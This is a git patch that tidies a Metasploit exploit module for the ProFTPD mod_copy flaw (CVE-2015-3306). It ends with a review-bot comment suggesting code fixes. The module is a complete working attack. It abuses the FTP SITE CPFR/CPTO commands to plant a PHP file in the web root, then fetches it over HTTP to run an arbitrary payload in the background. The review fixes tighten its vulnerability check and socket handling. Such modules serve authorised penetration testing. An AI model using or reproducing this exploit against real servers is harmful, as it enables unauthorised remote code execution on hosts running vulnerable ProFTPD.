From 5ab882a8d4c2647a91e7424adb3c47cf02cf8591 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 9 Jun 2015 13:58:01 -0500 Subject: [PATCH] Clean up module --- .../exploits/unix/ftp/proftpd_modcopy_exec.rb | 47 ++++++++++--------- 1 file changed, 24 insertions(+), 23 deletions(-) diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index 8d803b2338..5fc7f62908 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -6,6 +6,7 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp @@ -30,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2015-3306'], + [ 'CVE', '2015-3306' ], [ 'EDB', '36742' ], ], 'Privileged' => false, 
@@ -57,91 +58,91 @@ class Metasploit3 < Msf::Exploit::Remote OptPort.new('RPORT', [true, 'HTTP port', 80]), OptPort.new('RPORT_FTP', [true, 'FTP port', 21]), OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']), + OptString.new('TMPPATH', [true, 'Absolute writable/executable path', '/tmp']), OptString.new('TARGETURI', [true, 'Base path to the website', '/']) ], self.class) end def check ftp_port = datastore['RPORT_FTP'] - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port }) + sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? - fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service") + fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1,10) - unless ( res and res =~ /220/ ) + unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end sock.puts("SITE CPFR /etc/passwd\r\n") res = sock.get_once(-1,10) - if res and res =~ /350/ - return Exploit::CheckCode::Vulnerable + if res && res.include?('350') + Exploit::CheckCode::Vulnerable else - return Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end end def exploit - ftp_port = datastore['RPORT_FTP'] get_arg = rand_text_alphanumeric(5+rand(3)) payload_name = rand_text_alphanumeric(5+rand(3)) + '.php' - sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => ftp_port }) + sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? 
- fail_with(Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service") + fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1,10) - unless ( res and res =~ /220/ ) + unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end - print_status("#{rhost}:21 - Sending copy commands to FTP server") + print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server") sock.puts("SITE CPFR /proc/self/cmdline\r\n") res = sock.get_once(-1,10) - unless ( res and res =~ /350/ ) + unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline") end - sock.put("SITE CPTO /tmp/.\r\n") + sock.put("SITE CPTO #{datastore['TMPPATH']}/.\r\n") res = sock.get_once(-1,10) - unless ( res and res =~ /250/ ) + unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file") end - sock.put("SITE CPFR /tmp/.\r\n") + sock.put("SITE CPFR #{datastore['TMPPATH']}/.\r\n") res = sock.get_once(-1,10) - unless ( res and res =~ /350/ ) + unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file") end sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n") res = sock.get_once(-1,10) - unless ( res and res =~ /250/ ) + unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?") end sock.close print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") - res = send_request_cgi!({ + res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', 'vars_get' => { get_arg => "nohup #{payload.encoded} &" 
}, - }) + ) - unless ( res and res.code == 200 ) - fail_with(Failure::Unknown, "#{rhost}:21 - Failure executing payload") + unless res && res.code == 200 + fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload") end - end + end
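Review bot: The reply-code tests in `check` and `exploit` now use `res.include?('350')` (likewise `'220'` and `'250'`), which matches those digits anywhere in the reply, so `check` can report `Vulnerable` for a server whose refusal text merely contains "350". That is misleading for anyone using the check to assess exposure. Assuming the reply starts the buffer returned by `get_once`, anchoring on the code is tighter: `if res && res.start_with?('350')`. Separately, `check` never closes `sock`, and every `fail_with` path in `exploit` skips `sock.close`; wrapping each FTP exchange in `begin ... ensure sock.close if sock end` would release the connection. `check` also raises through `fail_with`, where returning `Exploit::CheckCode::Unknown` would let callers tell an unreachable or non-FTP host apart from a safe one.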